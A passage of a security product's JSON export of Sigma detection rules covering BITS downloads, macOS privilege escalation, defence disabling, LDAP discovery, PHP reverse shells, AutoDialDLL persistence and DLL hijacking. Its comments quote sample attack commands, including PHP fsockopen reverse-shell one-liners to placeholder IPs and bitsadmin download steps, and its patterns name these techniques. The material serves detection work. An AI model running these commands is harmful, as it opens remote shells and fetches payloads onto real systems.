"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085427Z",
"creation_date": "2026-03-23T11:45:34.085429Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085433Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
"https://docs.microsoft.com/windows/win32/bits/about-bits",
"https://attack.mitre.org/techniques/T1197/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0190/"
],
"name": "t1197_bitsadmin_download.yml",
"content": "title: File Downloaded or Exfiltrated via BITS\nid: 5f492e12-e643-41a2-a377-b8d8a2886883\ndescription: |\n Detects a suspicious attempt to download, copy or exfiltrate files and data using bitsadmin.\n Bitsadmin is a tool to manage the Background Intelligent Transfer Service (BITS) which is used to download files from or upload files to HTTP web servers and SMB file shares.\n This service is an asynchronous file transfer mechanism and is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\n By default, BITS jobs have a 90 days maximum lifetime if complete or cancel methods are not called.\n It is recommended to check the file that has been downloaded via the job for malicious content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n - https://docs.microsoft.com/windows/win32/bits/about-bits\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0190/\ndate: 2021/05/10\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1197\n - attack.command_and_control\n - attack.t1105\n - attack.s0190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Bitsadmin\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # bitsadmin /transfer \n\n # bitsadmin /create 1\n # bitsadmin /addfile 1 https://live.sysinternals.com/procdump.exe c:\\Windows\\Temp\\autoruns.exe\n # bitsadmin /resume 1\n # bitsadmin /complete 1\n\n # bitsadmin /create 1\n # bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\Windows\\temp\\cmd.exe\n # bitsadmin /resume 1\n # bitsadmin /complete 1\n selection_bin:\n - Image|endswith: '\\bitsadmin.exe'\n - OriginalFileName: 'bitsadmin.exe'\n\n selection_cmd:\n CommandLine|contains:\n - 'transfer'\n - 'addfile'\n\n condition: all of selection_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f492e12-e643-41a2-a377-b8d8a2886883",
"rule_name": "File Downloaded or Exfiltrated via BITS",
"rule_description": "Detects a suspicious attempt to download, copy or exfiltrate files and data using bitsadmin.\nBitsadmin is a tool to manage the Background Intelligent Transfer Service (BITS) which is used to download files from or upload files to HTTP web servers and SMB file shares.\nThis service is an asynchronous file transfer mechanism and is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\nBy default, BITS jobs have a 90 days maximum lifetime if complete or cancel methods are not called.\nIt is recommended to check the file that has been downloaded via the job for malicious content.\n",
"rule_creation_date": "2021-05-10",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1197"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f531d46-6898-4826-9350-6c5c294eabee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626016Z",
"creation_date": "2026-03-23T11:45:34.626018Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626022Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://objective-see.org/blog/blog_0x56.html",
"https://www.jamf.com/blog/detecting-insecure-application-updates-on-macos/",
"https://attack.mitre.org/techniques/T1548/",
"https://attack.mitre.org/techniques/T1548/004/"
],
"name": "t1548_004_security_authtrampoline_execution.yml",
"content": "title: Privilege Escalation via security_authtrampoline\nid: 5f531d46-6898-4826-9350-6c5c294eabee\ndescription: |\n Detects the execution of security_authtrampoline with a suspicious ancestor process.\n Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.\n It is recommended to check behavior of any children of security_authtrampoline and its parents for any suspicious activity.\nreferences:\n - https://objective-see.org/blog/blog_0x56.html\n - https://www.jamf.com/blog/detecting-insecure-application-updates-on-macos/\n - https://attack.mitre.org/techniques/T1548/\n - https://attack.mitre.org/techniques/T1548/004/\ndate: 2024/07/23\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1548.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n ProcessName: 'security_authtrampoline'\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n # process\n - 'osascript'\n - 'python'\n - 'perl'\n - 'ruby'\n - 'bash'\n - '/sh'\n - 'zsh'\n - 'com.apple.automator.runner'\n\n exclusion_launchd_script:\n ProcessAncestors|endswith: '|/bin/bash|/sbin/launchd'\n\n exclusion_red_giant_install:\n ProcessCommandLine|contains: '/var/folders/*/installer/Red Giant Installer/Red Giant Installer.app/Contents/MacOS/'\n\n exclusion_maxon:\n ProcessParentImage:\n - '/private/var/folders/*/installer/Universe Installer/Universe Installer.app/Contents/MacOS/Universe'\n - '/private/var/folders/*/installer/Red Giant Installer/Red Giant Installer.app/Contents/MacOS/Red Giant'\n ProcessCommandLine:\n - '/usr/libexec/security_authtrampoline /var/folders/*/installer/Universe Installer/Universe Installer.app/Contents/MacOS/osx-arm64 auth 4'\n - '/usr/libexec/security_authtrampoline /var/folders/*/installer/Red Giant Installer/Red Giant Installer.app/Contents/MacOS/osx-arm64 auth 4'\n\n exclusion_commandline:\n ProcessCommandLine:\n - '/usr/libexec/security_authtrampoline /bin/chmod auth * /Library/*'\n - '/usr/libexec/security_authtrampoline /bin/chmod auth * /Applications/*'\n - '/usr/libexec/security_authtrampoline /usr/sbin/chown auth * /Library/*'\n - '/usr/libexec/security_authtrampoline /usr/sbin/chown auth * /Applications/*'\n - '/usr/libexec/security_authtrampoline /bin/mkdir auth * /Library/*'\n - '/usr/libexec/security_authtrampoline /bin/mkdir auth * /Applications/*'\n - '/usr/libexec/security_authtrampoline /bin/rm auth */Library/*'\n - '/usr/libexec/security_authtrampoline /bin/rm auth */Applications/*'\n - '/usr/libexec/security_authtrampoline /usr/bin/ditto auth * /Volumes/* /Applications/*'\n - '/usr/libexec/security_authtrampoline /Volumes/Uninstall Kaspersky/Kaspersky Uninstaller.app/*'\n - '/usr/libexec/security_authtrampoline /bin/bash auth 3 -p -c /usr/bin/sudo /bin/launchctl remove com.bomgar.bomgar-*'\n - '/usr/libexec/security_authtrampoline /var/folders/*/Maxon Cinema 4D/Maxon Cinema 4D Installer.app/Contents/MacOS/osx-arm64 auth 4'\n - '/usr/libexec/security_authtrampoline /var/folders/*/Update/GeoComplyUpdate *'\n - '/usr/libexec/security_authtrampoline * remove com.bomgar.bomgar-ps-*'\n - '/usr/libexec/security_authtrampoline /Applications/ESET Endpoint Antivirus.app/*'\n - '/usr/libexec/security_authtrampoline /tmp/TempPrinterDriverFiles/Common/PerformOperations.app/*'\n\n exclusion_image:\n ProcessParentImage:\n - '/Volumes/Tunnelblick/Tunnelblick.app/Contents/MacOS/Tunnelblick'\n - '/Volumes/FXConsole_*_Installer.app/FXConsole_*_Installer.app/Contents/MacOS/vcinstaller'\n - '/private/tmp/*/Creative Cloud Installer.app/Contents/MacOS/Install'\n - '/Volumes/*/Adobe Creative Cloud Cleaner Tool.app/Contents/MacOS/Adobe Creative Cloud Cleaner Tool'\n - '/Volumes/EndNote Cite While You Write Installer/Install Cite While You Write.app/Contents/MacOS/Install Cite While You Write'\n - '/usr/local/McAfee/AntiMalware/AntiMalwareUpdate'\n - '/Users/Shared/Battle.net/Agent/Agent.app/Contents/MacOS/Switcher'\n - '/Volumes/Rescue HD/*/Wondershare Recoverit™ */Recoverit.app/Contents/MacOS/Recoverit'\n - '/Volumes/Chaos License Server/vrlservice_darwin.bin.app/Contents/MacOS/vrlservice_darwin.bin'\n - '/Volumes/Chaos License Server ?/vrlservice_darwin.bin.app/Contents/MacOS/vrlservice_darwin.bin'\n - '/Applications/Chaos/Cosmos/uninstall/installer'\n - '/Volumes/Perfection V850/EPSON.app/Contents/MacOS/EpsonInstaller'\n\n exclusion_mapple:\n ProcessCommandLine|startswith: '/usr/libexec/security_authtrampoline /tmp/Maple*MacUpgrade.app/Contents/MacOS/osx-x86_64'\n ProcessParentImage: '/private/tmp/Maple*MacUpgrade.app/Contents/MacOS/Maple'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f531d46-6898-4826-9350-6c5c294eabee",
"rule_name": "Privilege Escalation via security_authtrampoline",
"rule_description": "Detects the execution of security_authtrampoline with a suspicious ancestor process.\nAdversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.\nIt is recommended to check behavior of any children of security_authtrampoline and its parents for any suspicious activity.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-12-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1548.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f5b5009-39f7-48b4-894b-e553e54476eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621724Z",
"creation_date": "2026-03-23T11:45:34.621726Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621730Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1562_001_sensitive_service_disabled.yml",
"content": "title: Sensitive Service Disabled\nid: 5f5b5009-39f7-48b4-894b-e553e54476eb\ndescription: |\n Detects sensitive services such as Windows Defender or HarfangLab being disabled via a registry modification.\n Adversaries may disable sensitive services to try and avoid detection of their malicious activities.\n It is recommended to analyze the process responsible for the registry modification as well as to look for other suspicious actions on the host.\nreferences:\n - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2024/09/06\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdBoot\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdFilter\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdNisDrv\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdNisSvc\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\hlab_hurukai\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\hlprotect\\Start'\n Details: 'DWORD (0x00000004)' # SERVICE_DISABLED\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # Hlab is disabling itself when updating..\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f5b5009-39f7-48b4-894b-e553e54476eb",
"rule_name": "Sensitive Service Disabled",
"rule_description": "Detects sensitive services such as Windows Defender or HarfangLab being disabled via a registry modification.\nAdversaries may disable sensitive services to try and avoid detection of their malicious activities.\nIt is recommended to analyze the process responsible for the registry modification as well as to look for other suspicious actions on the host.\n",
"rule_creation_date": "2024-09-06",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f96cb48-bf55-484f-badd-d9da662dabd7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083661Z",
"creation_date": "2026-03-23T11:45:34.083663Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083668Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://sdbrett.com/BrettsITBlog/2016/12/discover-clear-admincount-powershell/",
"https://twitter.com/0gtweet/status/1493963591745220608",
"https://twitter.com/Oddvarmoe/status/927437787242090496",
"https://twitter.com/falsneg/status/1461625526640992260",
"https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw",
"https://attack.mitre.org/techniques/T1087/"
],
"name": "t1087_domain_admin_discovery_ldap_powershell.yml",
"content": "title: Domain Admin Discovered via LDAP by PowerShell\nid: 5f96cb48-bf55-484f-badd-d9da662dabd7\ndescription: |\n Detects an Active Directory Service Interfaces (ADSI) query that may indicate the discovery of domain admins via PowerShell.\n Adversaries may attempt to enumerate domain admin accounts during the discovery phase for privilege escalation and lateral movement.\n It is recommended to investigate the legitimacy of the PowerShell script.\nreferences:\n - https://sdbrett.com/BrettsITBlog/2016/12/discover-clear-admincount-powershell/\n - https://twitter.com/0gtweet/status/1493963591745220608\n - https://twitter.com/Oddvarmoe/status/927437787242090496\n - https://twitter.com/falsneg/status/1461625526640992260\n - https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw\n - https://attack.mitre.org/techniques/T1087/\ndate: 2025/10/20\nmodified: 2025/10/30\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'admincount=1'\n - 'admincount = 1'\n - 'admincount -eq 1'\n\n filter_scripts:\n PowershellScriptPath|endswith:\n - '.ps1'\n - '.psd1'\n - '.psm1'\n\n condition: selection and not 1 of filter_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f96cb48-bf55-484f-badd-d9da662dabd7",
"rule_name": "Domain Admin Discovered via LDAP by PowerShell",
"rule_description": "Detects an Active Directory Service Interfaces (ADSI) query that may indicate the discovery of domain admins via PowerShell.\nAdversaries may attempt to enumerate domain admin accounts during the discovery phase for privilege escalation and lateral movement.\nIt is recommended to investigate the legitimacy of the PowerShell script.\n",
"rule_creation_date": "2025-10-20",
"rule_modified_date": "2025-10-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f9f5085-ad6a-4474-9c6b-4f614b6e8b54",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600241Z",
"creation_date": "2026-03-23T11:45:34.600244Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600252Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_php_linux.yml",
"content": "title: Reverse Shell Executed via PHP\nid: 5f9f5085-ad6a-4474-9c6b-4f614b6e8b54\ndescription: |\n Detects different suspicious usages of PHP that are related to reverse shells.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewall restrictions.\n It is recommended to investigate the whole process tree for suspicious activities.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/07/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.PHP\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # php -r $sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");\n # php -r $sock=fsockopen(\"10.0.0.1\",1234);popen(\"/bin/sh -i <&3 >&3 2>&3\", \"r\");\n # php -r $s=fsockopen(\"192.168.2.6\",8080);shell_exec(\"/bin/sh -i <&3 >&3 2>&3\");\n # php -r $s=fsockopen(\"192.168.2.6\",8080);system(\"/bin/sh -i <&3 >&3 2>&3\");\n # php -r $s=fsockopen(\"192.168.2.6\",8080);`/bin/sh -i <&3 >&3 2>&3`;\n selection_fsockopen1:\n CommandLine|contains|all:\n - 'php'\n - 'fsockopen('\n - '2>&3'\n\n selection_fsockopen2:\n CommandLine|contains:\n - 'exec('\n - 'popen('\n - 'shell_exec('\n - 'system('\n - '`/bin/sh '\n - '`/bin/bash '\n - '`/bin/ksh '\n - '`/bin/zsh '\n - '`sh '\n - '`bash '\n - '`ksh '\n - '`zsh '\n\n # php -r '$sock=fsockopen(\"10.0.0.1\",1234);$proc=proc_open(\"/bin/sh -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'\n selection_procopen:\n CommandLine|contains|all:\n - 'php'\n - 'fsockopen('\n - 'proc_open('\n - 'array('\n - '=>'\n condition: (all of selection_fsockopen*) or selection_procopen\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f9f5085-ad6a-4474-9c6b-4f614b6e8b54",
"rule_name": "Reverse Shell Executed via PHP",
"rule_description": "Detects different suspicious usages of PHP that are related to reverse shells.\nA reverse shell is shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewall restrictions.\nIt is recommended to investigate the whole process tree for suspicious activities.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5fa2c53b-3193-4368-b86d-e1bf0d092af9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071634Z",
"creation_date": "2026-03-23T11:45:34.071637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071641Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_autodial_dll.yml",
"content": "title: Suspicious AutoDialDLL Registry Key Modified\nid: 5fa2c53b-3193-4368-b86d-e1bf0d092af9\ndescription: |\n Detects the creation or edition of the AutoDialDLL registry key that allows payload execution and persistence upon restarting the BITS service.\n This method is used as a mean to achieve persistence by replacing the original DLL image by a malicious payload.\n This DLL is also loaded by processed using the WinSock2 library since WinSock2 loads additionnal DLL as part of its modular components.\n This allows attackers to use this method as a lateral movement technique since they can plant the malicious AutoDialDLL on a target system, modify registry and wait for a process to use the WinSock2 API which will trigger execution.\n It is recommended to investigate the process that performed the registry modification to look for malicious content or actions, as well as to look for the execution of malicious code by the BITS service or software using Winsock2.\nreferences:\n - https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/10/27\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1570\n - attack.execution\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters\\AutodialDLL'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_legitimate:\n Details:\n - '?:\\windows\\system32\\rasadhlp.dll'\n - '%SystemRoot%\\system32\\rasadhlp.dll'\n - '%Windir%\\system32\\rasadhlp.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5fa2c53b-3193-4368-b86d-e1bf0d092af9",
"rule_name": "Suspicious AutoDialDLL Registry Key Modified",
"rule_description": "Detects the creation or edition of the AutoDialDLL registry key that allows payload execution and persistence upon restarting the BITS service.\nThis method is used as a mean to achieve persistence by replacing the original DLL image by a malicious payload.\nThis DLL is also loaded by processed using the WinSock2 library since WinSock2 loads additionnal DLL as part of its modular components.\nThis allows attackers to use this method as a lateral movement technique since they can plant the malicious AutoDialDLL on a target system, modify registry and wait for a process to use the WinSock2 API which will trigger execution.\nIt is recommended to investigate the process that performed the registry modification to look for malicious content or actions, as well as to look for the execution of malicious code by the BITS service or software using Winsock2.\n",
"rule_creation_date": "2022-10-27",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5fa685c8-ce30-4b62-b050-279c87efed32",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097936Z",
"creation_date": "2026-03-23T11:45:34.097938Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097943Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_alg.yml",
"content": "title: DLL Hijacking via ALG.exe\nid: 5fa685c8-ce30-4b62-b050-279c87efed32\ndescription: |\n Detects potential Windows DLL Hijacking via ALG.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ALG.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cryptbase.dll'\n - '\\mswsock.dll'\n 